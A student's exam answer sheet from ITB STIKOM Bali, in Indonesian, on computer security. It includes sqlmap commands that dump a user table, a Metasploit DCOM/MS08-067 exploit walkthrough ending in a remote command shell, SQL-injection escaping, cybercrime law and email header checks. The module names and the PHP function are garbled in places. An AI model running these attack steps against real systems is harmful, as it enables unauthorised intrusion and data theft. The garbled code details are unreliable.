INSTITUT TEKNOLOGI DAN BISNIS (ITB) STIKOM BALI

Jl. Raya Puputan Renon No. 86 Denpasar – Bali Telp. (0361) 244445 (Hunting) Fax. 264773

LEMBAR JAWABAN UJIAN AKHIR SEMESTER PENDEK 2019/2020

NIM : 170030779

NAMA : INYOMAN AGUS ANDIKA

1. C:\Python26\SQLmap>sqlmap.py -u http://www.localhost.com/product/product.php?=10 –dbs C:\Python26\SQLmap>sqlmap.py -u http://www.localhost.com/product/product.php?=10 -D dbxxx – tables

C:\Python26\SQLmap>sqlmap.py -u http://www.localhost.com/product/product.php?=10 -D dbxxx -T t_sysuser –dump

2. Caranya adalah dengan cara menggunakan fungsi my_sql_real_escape_string() pada halaman login.

caranya sebagai berikut :

Contoh username dan pasword dapatkan dari metode $_POST

$username =$_POST[‘username’];

$pasword =$_POST[‘pasword’];

Cara menggunakan fungsi my_sql_ real_escape_string() :

$username = my_sql_real_escape_string($_POST[‘username’]);

$pasword = my_sql_real_escape_string($_POST[‘pasword’]);

3. Secara umum masyarakat memandang UU ITE masih hanya sebagai formalitas sesaat, yang mana peraturan dan perundang-undang yang disusun, hanya berlaku jika ada kasus yang mencuat. Dalam kehidupan sehari-hari baik masyarakat umum ataupun kaum terpelajar tidak sepenuhnya mematuhi atau mengindahkan UU ITE ini, terbukti dengan masih tingginya tingkat pelanggaran cyber, penipuan, ataupun pengaksessan situs porno. Maka dari itu sosialisasi UU ITE pada masyarakat juga memiliki peran penting.

Seperti edukasi kepada masyarakat dapat dilakukan dengan berbagai cara, diantaranya dengan mengkampanyekan internet sehat lewat media, membagikan software untuk memfilter situs-situs bermuatan porno dan kekerasan.

Kasus cybercrime :

a. Pasal 27 UU ITE tahun 2008 : Setiap orang dengan sengaja dan tanpa hak mendistribusikan dan/atau mentransmisikan dan/atau membuat dapat diaksesnya informasi elektronik dan/atau dokumen elektronik yang memiliki muatan yang melanggar kesusilaan. Ancaman pidana pasal 45(1) KUHP. Pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp 1.000.000.000,00 (satu miliar rupiah). Diatur pula dalam KUHP pasal 282 mengenaikejahatan terhadap kesusilaan.

b. Pasal 28 UU ITE tahun 2008 : Setiap orang dengan sengaja dan tanpa hak menyebarkan berita bohong dan menyesatkan yang mengakibatkan kerugian konsumen dalam transaksi elektronik.

c. Pasal 34 UU ITE tahun 2008 : Setiap orang dengan sengaja dan tanpa hak atau melawan hukum memproduksi, menjual, mengadakan untuk digunakan, mengimpor, mendistribusikan,

menyediakan atau memiliki.

4. cara melakukan command line menggunakan Metasploit tools untuk melakukan exploitasi a. Mcdconsole

b. msf>search dcom

setelah terbuka setingan kali ini menggunakan ms03_026_dcom c. msf>user/windows/scrpc/ms08_067_dcom

akan keluar msf exploit(ms03_026_dcom)>

d. msf exploit(ms03_026_dcom) > show options akan keluar seperti berikut

[sourcecode languange=”bash”]

Module options (exploit/windows/dcerpc/ms08_067dcom):

Name Current Setting Required Description ————— ——– ———–

RHOST yes The target address RPORT 445 yes The target port Exploit target:

Id Name

— —-

[/sourcecode]

e. lalu samakan dengan ip target

msf exploit(ms08_067_dcom) > set RHOST 10.10.10.1 RHOST => 10.10.10.1

f. lalu cek payload dengan

msf exploit(ms08_067_dcom) > show payloads g. setelah itu kila lakukan eksploit dengan msf exploit(ms08_067_dcom) > exploit

lalu akan keluar seperti berikut dan exploitasi telah selesai

[sourcecode languange=”bash”]

[*] Started bind handler

[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.1[135] … [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.10.10.1[135] … [*] Sending exploit …

[*] Command shell session 1 opened (192.168.10.2:34778 -> 10.10.10.1:4444) at Sun Aug 06 13:56:48 +0700 2020

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

[/sourcecode]

5. Malware Propagation

Dunia komunikasi email dan internet kadang terasa penuh dengan bahaya malware, virus. Sistem email perusahaan Anda kemungkinan telah memiliki software anti-spam dan anti-virus untuk melindungi email kantor Anda dari email bervirus. Namun software tersebut tidak dapat mencegah semua malicious email dan beberapa malicious threats yang datang dari internet, di antaranya:

Trojan horses Virus

Worms Spyware Ransomware

Langkah langkah melihat header :

1. Buka email yang ingin Anda periksa header-nya.

2. Di samping Balas , klik Lainnya Tampilkan versi asli.

3. Salin teks pada halaman.

4. Buka Fitur header pesan.

5. Di bagian "Tempel header email di sini", tempelkan header Anda.

6. Klik Analisis header di atas.